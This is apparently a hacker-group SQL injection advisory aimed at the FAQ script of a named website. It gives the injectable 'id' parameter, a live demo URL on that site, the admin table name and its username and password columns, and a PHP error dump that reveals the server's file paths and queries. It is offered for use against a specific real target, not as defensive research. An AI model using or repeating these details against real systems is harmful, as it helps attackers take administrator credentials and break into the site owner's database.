|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|*		 ______  ____     __  __     			      |
|*		/\__  _\/\  _`\  /\ \/\ \       	              |
|*		\/_/\ \/\ \ \L\ \\ \ \_\ \   { Turki$ hackers }       |
|*		   \ \ \ \ \  _ <'\ \  _  \   		              |
|*		    \ \ \ \ \ \L\ \\ \ \ \ \                          |
|*		     \ \_\ \ \____/ \ \_\ \_\			      |
|*		      \/_/  \/___/   \/_/\/_/		              |
|*				                               	      |
|*	                    I'm Wolf Long live wolf		      |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title]	        :[dgc sql injection vulnerability]            /*   
\* [Author]	        :[skote_vahshat]                              /*
\* [Home]	        :[Http://turk-bh.ir]                          /*
\* [Email] 	        :[skote.vahshat@Gmail.Com]                    /*

=======================================================================
/* Web Server ==>> [ Apache/2.0.55 (Ubuntu) PHP/4.4.2-1build1 ]
/* Powered-by ==>> [ PHP/4.4.2-1build1 ]
/* DB Server ==>> [ MySQL ]
/*
/* [+]Exploit :
/*              http://www.target.com/faq2.php?id=[SQLi]
/* [+]Demo:
/*  		http://www.dgc.ca/faq2.php?language=0&id=173&faqid=573
/* [+] Tble admin:
/*            bs_availability_user
/*
/* [+]column name:
/*   username    pass
/*
/*    [+]ErroR injection:
/*
/*
/*/-----------------------
/*

/*    		     SELECT * FROM faq WHERE id = 573
<?php
 = array (
  0 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 26,
    'function' => 'querydb',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
      0 => 'SELECT * FROM faq WHERE id = 573\\\'',
    ),
  ),
  1 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 20,
    'function' => 'load',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
    ),
  ),
  2 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/faq2.php',
    'line' => 150,
    'function' => 'faq',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
      0 => '573\\\'',
    ),
  ),
);
?>
/*
// QUERY: SELECT id FROM faq WHERE parent_id = 573\' ORDER BY display_order
<?php
 = array (
  0 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/include/faq.php',
    'line' => 201,
    'function' => 'querydb',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
      0 => 'SELECT id FROM faq WHERE parent_id = 573\\\' ORDER BY display_order',
    ),
  ),
  1 => 
  array (
    'file' => '/mnt/alpha/dgc.ca/faq2.php',
    'line' => 151,
    'function' => 'get_children_ids',
    'class' => 'faq',
    'type' => '->',
    'args' => 
    array (
    ),
  ),
);
?>
=======================================================================
|_***_| spical thanks : bl4ck.viper ,dr.tofan , nafsh, netqurd         |  
|_***_| tbh team , cyberwh team ,                    all turkiS hackers|
=======================================================================